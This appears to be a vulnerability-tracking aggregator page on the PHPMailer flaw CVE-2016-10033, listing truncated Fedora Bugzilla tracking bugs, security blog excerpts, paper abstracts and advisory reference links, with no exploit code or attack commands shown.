Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple suppor
Bugzilla
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
Bugzilla
CVE-2016-10033 drupal8: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ver
Bugzilla
CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported
arXiv
XGV-BERT: Leveraging Contextualized Language Model and Graph Neural Network for Efficient Software Vulnerability Detection
arxiv_fulltext·2023-09-26
[inst1,inst2] Vu Le Anh
[inst1,inst2] Chau Thuan
[inst1,inst2] Kiet Van
[inst1,inst2] Phan The
[inst1,inst2] Van-Hau
[inst1] Information Security Laboratory, University of Information Technology, Ho Chi Minh city, Vietnam
[inst2] Vietnam National University Ho Chi Minh City, Hochiminh City, Vietnam
## Abstract
With the advancement of deep learning (DL) in various fields, there are many attempts to reveal software vulnerabilities by data-driven approach. Nonetheless, such existing works lac
arXiv
Lic-Sec: an enhanced AppArmor Docker security profile generator
arxiv_fulltext·2020-09-24
[1] Hui Zhu
[1] Christian Gehrmann
[1] Department of Electrical and Information Technology, Lund University, Lund, Sweden
## Abstract
Along with the rapid development of cloud computing technology, containerization technology has drawn much attention from both industry and academia. In this paper, we perform a comparative measurement analysis of Docker-sec, which is a Linux Security Module proposed in 2018, and a new AppArmor profile generator called Lic-Sec, which combines Docker-sec with a modified version of LiCShield, which is also a Linux Security Module proposed in 2015. Docker-sec and LiCShield can be used to enhance Docker container sec
Fortinet
Incomplete Patch: Another Joomla! Core XSS Vulnerability Is Discovered
blogs_fortinet·2018-05-25·CVSS 6.1
FORTIGUARD LABS THREAT RESEARCH
By Zhouyuan Yang | May 25, 2018
In a previous FortiGuard Labs blog I documented that Joomla! had failed to patch two Cross-Site Scripting (XSS) vulnerabilities – CVE-2017-7985 and CVE-2017-7986 – that I had previously discovered. After reporting the issue to Joomla!, they released a patch and published a separate security announcement in July of 2017. But this separate patch still doesn’t fully fix the issue. Earlier this year, I discovered a new way to bypass the Joomla! XSS filter at the same injection point. This new vulnerability has been assigned the CVE ID CVE-2018-11326.
Just as with CVE-2017-7985 and CVE-2017-7986, this new injection point exists in the front end, under th
Fortinet
PHPMailer Powered – Use It, But Also Remember to Update It
blogs_fortinet·2017-02-16·CVSS 9.8
By Tien Phan | February 16, 2017
At the end of last year, a critical vulnerability in PHPMailer that affected millions of websites – CVE-2016-10033 - was discovered by Polish security researcher Dawid Golunski. This vulnerability allows an attacker to compromise the target’s web application by executing remote code on the vulnerable web server.
There are numerous open source web applications that use PHPMailer as their main library for sending emails, including WordPress, Joomla, Yii, SugarCRM…
More than a month after PHPMailer released a patch for this critical vulnerability we compiled this short research, and the result may surprise you. As you will see, there are still a lot of web open sourc
Fortinet
Analysis of PHPMailer Remote Code Execution Vulnerability (CVE-2016-10033)
blogs_fortinet·2017-01-05·CVSS 9.8
By Zhouyuan Yang | January 05, 2017
PHP is an open source, general-purpose scripting language used for web development that can also be embedded into HTML. It has over 9 million users, and is used by many popular tools, such as WordPress, Drupal, Joomla!, and so on. This week, a high-level security update was released to fix a remote code execution vulnerability (CVE-2016-10033) in PHPMailer, which is an open source PHP library for sending emails from PHP websites.
This critical vulnerability is caused by class.phpmailer.php incorrectly processing user requests. As a result, remote attackers are able to execute code on vulnerable servers.
This vulnerability affects PHPMailer versi
Fortinet
Joomla – From Nowhere to High Privilege
blogs_fortinet·2016-10-27·CVSS 9.8
By Tien Phan | October 27, 2016
Joomla, a popular free and open-source content management system, just released version 3.6.4 that fixed two critical vulnerabilities:
[CVE-2016-8870] - Core - Account Creation: attackers can exploit this vulnerability to create any account in a Joomla system regardless of whether its registration has been disabled.
[CVE-2016-8869] - Core - Elevated Privileges: with the vulnerability above, an attacker not only can register an account in a vulnerable system, but also register with the highest privilege – Administrator.
We took a deeper dive to see how these exploits tick and would like to congratulate Davide Tampellini on his first CVE discovery.
CVE-2016-8870 - From no one to havin
Fortinet
Analysis of PHP's CVE-2016-6289 and CVE-2016-6297
blogs_fortinet·2016-08-10·CVSS 4.3
By Tony Loi | August 10, 2016
PHP is a programming language that was created in 1995 by Rasmus Lerdorf. And according to W3Techs, it’s dynamically generating content on more than 82% of all websites worldwide. That means hundreds of millions of web servers are vulnerable to the flaws we are describing below.
Last month, FortiGuard discovered two security issues in PHP’s core (CVE-2016-6189) and in PHP’s zip (CVE-2016-6197). These issues affect both the current PHP version 5 and its upcoming version 7. These bugs are located in different parts of the code, and feature different functionalities, but they share the same type:
Integer overflow
Stack-based buffer overflow
A well-trained eye can identify these
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
http://packetstormsecurity.com/files/140291/PHPMailer-Remote-Code-Execution.html
http://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.html
http://seclists.org/fulldisclosure/2016/Dec/78
http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injection
http://www.securityfocus.com/archive/1/539963/100/0/threaded
http://www.securityfocus.com/bid/95108
http://www.securitytracker.com/id/1037533
https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.html
https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.18
https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://www.drupal.org/psa-2016-004
https://www.exploit-db.com/exploits/40968/
https://www.exploit-db.com/exploits/40969/
https://www.exploit-db.com/exploits/40970/
https://www.exploit-db.com/exploits/40974/
https://www.exploit-db.com/exploits/40986/
https://www.exploit-db.com/exploits/41962/
https://www.exploit-db.com/exploits/41996/
https://www.exploit-db.com/exploits/42024/
https://www.exploit-db.com/exploits/42221/
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-10033
Published: 2016-12-30
Added to CISA KEV: 2025-07-07
Exploited in the wild